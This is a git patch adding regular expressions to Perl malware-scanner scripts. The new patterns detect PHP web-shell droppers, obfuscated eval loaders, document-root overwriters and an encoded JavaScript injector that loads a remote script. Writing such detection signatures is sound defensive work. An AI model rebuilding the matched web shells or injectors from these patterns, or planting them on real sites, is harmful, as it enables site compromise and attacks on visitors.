From 58d02edfd57cb9488bba0553407d1dc19356132d Mon Sep 17 00:00:00 2001
From: Palma Solutions LTD <malin@cenusa.me>
Date: Thu, 27 Sep 2018 11:14:20 +0200
Subject: [PATCH] new patterns

---
 malware6.pl  | 7 ++++++-
 malwaresh.pl | 6 ++++++
 2 files changed, 12 insertions(+), 1 deletion(-)

diff --git a/malware6.pl b/malware6.pl
index cf78fe6..e96b487 100644
--- a/malware6.pl
+++ b/malware6.pl
@@ -303,7 +303,12 @@ my @regexen = (
     qr/<\?php \@file_put_contents\(\'([A-z0-9_]{1,20})\'\,\'<\?php \'\.base64_decode\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\); \@include\(\'([A-z0-9_]{1,20})\'\); \@unlink\(\'([A-z0-9_]{1,20})\'\); \?>/is,
     qr/<\?php \$([A-z0-9_]{1,20}) = \'find \/ -type f -name \"\*\" \| xargs grep -rl \"<head\"\';\s+\$([A-z0-9_]{1,20}) = \"<script language=javascript>eval\(String\.fromCharCode\(.+?\@system\(\"chmod 777 \"\.\$([A-z0-9_]{1,20})\);\s+\@file_put_contents\(\$([A-z0-9_]{1,20}),\$([A-z0-9_]{1,20})\);\s+echo \$([A-z0-9_]{1,20});\s+\}\s+\}\s+\}/is,
     qr/eval\(String\.fromCharCode\(118, 97, 114, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 49, 53, 44, 32, 49, 49, 54, 44, 32, 57, 55, 44, 32, 49, 49, 54, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 44, 32, 54, 51, 44, 32, 49, 49, 56, 44, 32, 54, 49, 44, 32, 52, 57, 44, 32, 52, 54, 44, 32, 52, 56, 44, 32, 52, 54, 44, 32, 53, 49, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 41, 59, 32, 125\)\);/is,
-
+    qr/<\?php\s+error_reporting\(E_ERROR\);set_time_limit\(0\);\s+if\(isset\(\$_POST\[\'([A-z0-9_]{1,20})\'\]\)\)\{\s+\$tofile=\'40\d\.php\';\s+\$([A-z0-9_]{1,20}) =base64_decode\(strtr\(\$_POST\[\'([A-z0-9_]{1,20})\'\], \'\-\_,\', \'\+\/=\'\)\);\s+\$([A-z0-9_]{1,20})=\'<\?php \'\.\$([A-z0-9_]{1,20})\.\'\?>\';\s+\@file_put_contents\(\$tofile,\$([A-z0-9_]{1,20})\);\s+require_once\(\'40\d\.php\'\);\s+\@unlink\(\$tofile\);\s+exit;\s+\}\s+\?>/is,
+    qr/<\?php \/\*([A-z0-9_]{1,20})\*\/ \?>/is,
+    qr/<\?php \$([A-z0-9_]{1,20}) = \".+?function ([A-z0-9_]{1,30})\(\$\w,\$\w,\$\w\)\{return \$\w\.\$\w\.\$\w;\}\$.+?\(\"o\\x64e\",chr\(40\),\"\"\);\$.+?\"\.\$([A-z0-9_]{1,20});\$([A-z0-9_]{1,20})\(\'\', \'\}\'\.\$([A-z0-9_]{1,20})\.\'\/\/\'\);\s+\?>/is,
+    qr/<\?php \$([A-z0-9_]{1,20}) = \".+?function ([A-z0-9_]{1,30})\(\$\w,\$\w,\$\w\)\{return \$\w\.\$\w\.\$\w;\}\$.+?\(\"\\x65va\",chr\(108\),\"\"\.chr\(40\)\);\$.+?\"\.\$([A-z0-9_]{1,20});\$([A-z0-9_]{1,20})\(\'\', \'\}\'\.\$([A-z0-9_]{1,20})\.\'\/\/\'\);/is,
+    qr/<\?php\s+if\(isset\(\$_POST\[\'([A-z0-9_]{1,30})\'\]\)\)\{\s+\$index=\$_SERVER\[\'DOCUMENT_ROOT\'\]\.base64_decode\(strtr\(\$_POST\[\'filename\'\],\'\-\_,\',\'\+\/=\'\)\);.+?if\(strlen\(\$\w\)<300\)\{echo \'indexcode is null\';exit;\}\s+if\(file_exists\(\$index\)\)\{\@chmod\(\$index,0755\);\@unlink\(\$index\);\}\@file_put_contents\(\$index,\$\w\);echo \'ok\';\s+\}\s+\?>/is,
+    
    
    
    
diff --git a/malwaresh.pl b/malwaresh.pl
index 319df30..23952c2 100644
--- a/malwaresh.pl
+++ b/malwaresh.pl
@@ -1290,6 +1290,12 @@ my @regexen = (
     qr/<\?php \@file_put_contents\(\'([A-z0-9_]{1,20})\'\,\'<\?php \'\.base64_decode\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\); \@include\(\'([A-z0-9_]{1,20})\'\); \@unlink\(\'([A-z0-9_]{1,20})\'\); \?>/is,
     qr/<\?php \$([A-z0-9_]{1,20}) = \'find \/ -type f -name \"\*\" \| xargs grep -rl \"<head\"\';\s+\$([A-z0-9_]{1,20}) = \"<script language=javascript>eval\(String\.fromCharCode\(.+?\@system\(\"chmod 777 \"\.\$([A-z0-9_]{1,20})\);\s+\@file_put_contents\(\$([A-z0-9_]{1,20}),\$([A-z0-9_]{1,20})\);\s+echo \$([A-z0-9_]{1,20});\s+\}\s+\}\s+\}/is,
     qr/eval\(String\.fromCharCode\(118, 97, 114, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 49, 53, 44, 32, 49, 49, 54, 44, 32, 57, 55, 44, 32, 49, 49, 54, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 44, 32, 54, 51, 44, 32, 49, 49, 56, 44, 32, 54, 49, 44, 32, 52, 57, 44, 32, 52, 54, 44, 32, 52, 56, 44, 32, 52, 54, 44, 32, 53, 49, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 41, 59, 32, 125\)\);/is,
+    qr/<\?php\s+error_reporting\(E_ERROR\);set_time_limit\(0\);\s+if\(isset\(\$_POST\[\'([A-z0-9_]{1,20})\'\]\)\)\{\s+\$tofile=\'40\d\.php\';\s+\$([A-z0-9_]{1,20}) =base64_decode\(strtr\(\$_POST\[\'([A-z0-9_]{1,20})\'\], \'\-\_,\', \'\+\/=\'\)\);\s+\$([A-z0-9_]{1,20})=\'<\?php \'\.\$([A-z0-9_]{1,20})\.\'\?>\';\s+\@file_put_contents\(\$tofile,\$([A-z0-9_]{1,20})\);\s+require_once\(\'40\d\.php\'\);\s+\@unlink\(\$tofile\);\s+exit;\s+\}\s+\?>/is,
+    qr/<\?php \/\*([A-z0-9_]{1,20})\*\/ \?>/is,
+    qr/<\?php \$([A-z0-9_]{1,20}) = \".+?function ([A-z0-9_]{1,30})\(\$\w,\$\w,\$\w\)\{return \$\w\.\$\w\.\$\w;\}\$.+?\(\"o\\x64e\",chr\(40\),\"\"\);\$.+?\"\.\$([A-z0-9_]{1,20});\$([A-z0-9_]{1,20})\(\'\', \'\}\'\.\$([A-z0-9_]{1,20})\.\'\/\/\'\);\s+\?>/is,
+    qr/<\?php \$([A-z0-9_]{1,20}) = \".+?function ([A-z0-9_]{1,30})\(\$\w,\$\w,\$\w\)\{return \$\w\.\$\w\.\$\w;\}\$.+?\(\"\\x65va\",chr\(108\),\"\"\.chr\(40\)\);\$.+?\"\.\$([A-z0-9_]{1,20});\$([A-z0-9_]{1,20})\(\'\', \'\}\'\.\$([A-z0-9_]{1,20})\.\'\/\/\'\);/is,
+    qr/<\?php\s+if\(isset\(\$_POST\[\'([A-z0-9_]{1,30})\'\]\)\)\{\s+\$index=\$_SERVER\[\'DOCUMENT_ROOT\'\]\.base64_decode\(strtr\(\$_POST\[\'filename\'\],\'\-\_,\',\'\+\/=\'\)\);.+?if\(strlen\(\$\w\)<300\)\{echo \'indexcode is null\';exit;\}\s+if\(file_exists\(\$index\)\)\{\@chmod\(\$index,0755\);\@unlink\(\$index\);\}\@file_put_contents\(\$index,\$\w\);echo \'ok\';\s+\}\s+\?>/is,
+    
 
 );